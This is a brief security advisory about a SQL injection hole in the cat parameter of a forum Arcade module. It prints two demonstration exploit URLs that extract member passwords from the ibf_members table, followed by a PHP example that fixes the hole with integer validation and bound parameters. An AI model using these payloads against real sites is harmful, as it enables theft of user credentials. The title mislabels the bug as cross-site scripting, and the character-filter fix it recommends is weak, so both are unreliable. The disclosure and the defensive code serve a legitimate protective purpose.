Validation Hole Permits Cross-Site Scripting Attacks

A remote user can inject SQL commands. A specially crafted value for the cat parameter of the Arcade action (index.php?act=Arcade) is executed as SQL on the underlying database.

A demonstration exploit URL (I) is provided:
http://[target]/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,
password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

A demonstration exploit URL (II) is provided:
http://[target]/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,
legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

SOLUTION
Filter the following characters out of user input:
'"!@#$%^^&&*()=+
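
Since cat is a numeric id, the handler can go further than a character filter: accept only an integer and pass it to the query as a bound parameter. The following is an added example, not code from the Arcade module or from the original advisory; the arcade_games table, its rows and the gamesInCategory() function are hypothetical, and it uses an in-memory SQLite database through PDO so that it runs on its own.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-in for the arcade game table; the rows are constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE arcade_games (id INTEGER PRIMARY KEY, cat INTEGER, title TEXT)');
$db->exec("INSERT INTO arcade_games (cat, title) VALUES (1, 'Pong'), (1, 'Snake'), (2, 'Chess')");

/**
 * Return the game titles in a category, or null when $rawCat is not a plain integer.
 */
function gamesInCategory(PDO $db, string $rawCat): ?array
{
    // Allowlist: a category id is an integer in a bounded range, nothing else.
    $cat = filter_var($rawCat, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 0, 'max_range' => 100000],
    ]);
    if ($cat === false) {
        return null; // reject the request; do not try to "clean" the value
    }

    // Bound parameter: the value is sent as data and never becomes SQL text.
    $stmt = $db->prepare('SELECT title FROM arcade_games WHERE cat = :cat ORDER BY id');
    $stmt->bindValue(':cat', $cat, PDO::PARAM_INT);
    $stmt->execute();

    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed inputs: a normal id, and a value shaped like the cat parameter in the URLs above.
foreach (['1', '-1 UNION SELECT 0,0,name FROM ibf_members'] as $input) {
    $result = gamesInCategory($db, $input);
    echo json_encode($input), ' => ', $result === null ? 'rejected' : json_encode($result), PHP_EOL;
}
```

The rejected branch is also a useful place to log the request, since a non-numeric cat value never occurs in normal use.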

Source: somewhere on the internet

Sincerely,

Eko Wahyudiharto